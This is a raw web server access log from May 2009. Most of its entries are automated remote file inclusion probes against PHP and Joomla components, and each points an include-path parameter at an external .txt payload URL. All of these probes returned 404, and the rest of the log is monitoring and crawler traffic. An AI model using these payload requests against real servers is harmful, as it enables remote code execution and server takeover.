85.10.128.219 - - [30/May/2009:06:35:43 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:35:47 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:35:47 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:36:09 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:36:09 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:36:09 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:36:21 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:36:26 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:36:26 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:36:29 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:36:33 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:36:33 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
24.132.148.25 - - [30/May/2009:06:36:34 -0400] "GET /logs/error_log.Q108120300//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.64"
209.59.12.99 - - [30/May/2009:06:36:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [30/May/2009:06:36:40 -0400] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:36:41 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:37:28 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:37:29 -0400] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:37:29 -0400] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:37:32 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:37:39 -0400] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:37:39 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:37:59 -0400] "GET /logs/access_log.Q109052100%20%20/config.php?path_to_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:41 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:41 -0400] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:41 -0400] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:46 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:46 -0400] "GET /logs/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [30/May/2009:06:38:46 -0400] "GET /index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:38:52 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:39:24 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:06:39:40 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:40:15 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:40:30 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:40:42 -0400] "GET /logs/access_log.Q109051500/?sourcedir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:41:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [30/May/2009:06:43:02 -0400] "GET /index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:43:02 -0400] "GET /logs/index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:43:02 -0400] "GET /logs/access_log.Q109010700%20%20/index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:43:10 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:06:44:13 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:46:22 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.12.99 - - [30/May/2009:06:46:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [30/May/2009:06:47:10 -0400] "GET /logs/access_log.Q109051700//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:47:10 -0400] "GET /logs//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:47:10 -0400] "GET //maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:47:11 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:47:20 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:48:01 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
216.17.99.13 - - [30/May/2009:06:48:05 -0400] "GET /logs/access_log.Q109051700%20%20//maillist/install/install3.php?database=none&cabsolute_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:06:48:29 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:06:48:31 -0400] "GET //login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:48:31 -0400] "GET /logs//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:48:31 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:48:40 -0400] "GET /logs/access_log.Q109052300%20%20//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:49:30 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:49:30 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:49:30 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:06:49:38 -0400] "GET /images/Office%20Supply/LCALEN.HTM HTTP/1.0" 200 7957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.18.117.101 - - [30/May/2009:06:50:23 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:50:23 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:50:23 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:50:44 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:50:44 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:50:44 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:51:23 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:06:51:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [30/May/2009:06:51:56 -0400] "GET /logs/access_log.Q109052300/index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:51:57 -0400] "GET /logs/access_log.Q109051600/index.php?pagina=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
194.126.110.134 - - [30/May/2009:06:52:06 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:06:52:12 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:52:25 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:52:25 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:52:25 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:53:21 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:53:35 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:53:35 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:53:35 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:54:00 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:54:01 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.103.72.130 - - [30/May/2009:06:54:02 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:54:09 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:54:15 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:54:15 -0400] "GET /logs/access_log.Q109050700%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:54:15 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.179.130 - - [30/May/2009:06:55:10 -0400] "GET /logs/error_log.Q108120300//add.php?APB_rp=http://jsparix.nuxit.net//components/com_zoom/classes/telid.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
118.98.212.6 - - [30/May/2009:06:55:13 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
218.146.255.11 - - [30/May/2009:06:55:19 -0400] "GET /logs/error_log.Q108111900//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
218.146.255.11 - - [30/May/2009:06:55:19 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
218.146.255.11 - - [30/May/2009:06:55:20 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
118.98.212.6 - - [30/May/2009:06:55:29 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:06:55:29 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
218.146.255.11 - - [30/May/2009:06:55:38 -0400] "GET /logs/error_log.Q109020900//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/yes.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
155.185.215.15 - - [30/May/2009:06:55:38 -0400] "GET /logs/access_log.Q108112300//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
155.185.215.15 - - [30/May/2009:06:55:38 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
155.185.215.15 - - [30/May/2009:06:55:39 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
118.98.212.6 - - [30/May/2009:06:55:43 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
155.185.215.15 - - [30/May/2009:06:56:21 -0400] "GET /logs/error_log.Q108111900//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://imagehut.ws/logopsd/yes.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
209.59.12.99 - - [30/May/2009:06:56:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.194.204.129 - - [30/May/2009:06:56:41 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:56:41 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.194.204.129 - - [30/May/2009:06:56:41 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:56:55 -0400] "GET //ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:56:55 -0400] "GET /logs/access_log.Q109051500//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:56:55 -0400] "GET /logs//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.17.99.13 - - [30/May/2009:06:57:03 -0400] "GET /logs/access_log.Q109052100//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:57:53 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:57:53 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:57:53 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:06:57:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF401781C7006F9D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.16 - - [30/May/2009:06:58:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102121498F518700644E06Z+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.16 - - [30/May/2009:06:58:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102110458CC14700777E06Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [30/May/2009:06:58:25 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:58:25 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:58:25 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:06:58:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102110458C211700777E06Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.17.99.13 - - [30/May/2009:06:58:31 -0400] "GET /logs/access_log.Q109051500%20%20//ask_password.php?%20dir=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:06:58:38 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L6074F13D256876001D0901F+WSEQ(S0060):1+OUITEM(A0200):45491003 HTTP/1.1" 200 27017 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.162.28 - - [30/May/2009:06:58:58 -0400] "GET //include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:58:58 -0400] "GET /logs//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:06:59:00 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:59:14 -0400] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:59:14 -0400] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:59:15 -0400] "GET /logs/error_log.Q108111900%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.146.255.11 - - [30/May/2009:06:59:55 -0400] "GET /logs/error_log.Q109020900%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:07:00:03 -0400] "GET /logs/access_log.Q109051100//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:07:00:04 -0400] "GET //include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.98.212.6 - - [30/May/2009:07:00:05 -0400] "GET /logs//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:07:00:12 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:00:22 -0400] "GET /logs/access_log.Q109052300//login.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.98.212.6 - - [30/May/2009:07:00:26 -0400] "GET /logs/access_log.Q109051600//include.php?language=0&lang_settings[0][1]=http://phanservice.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
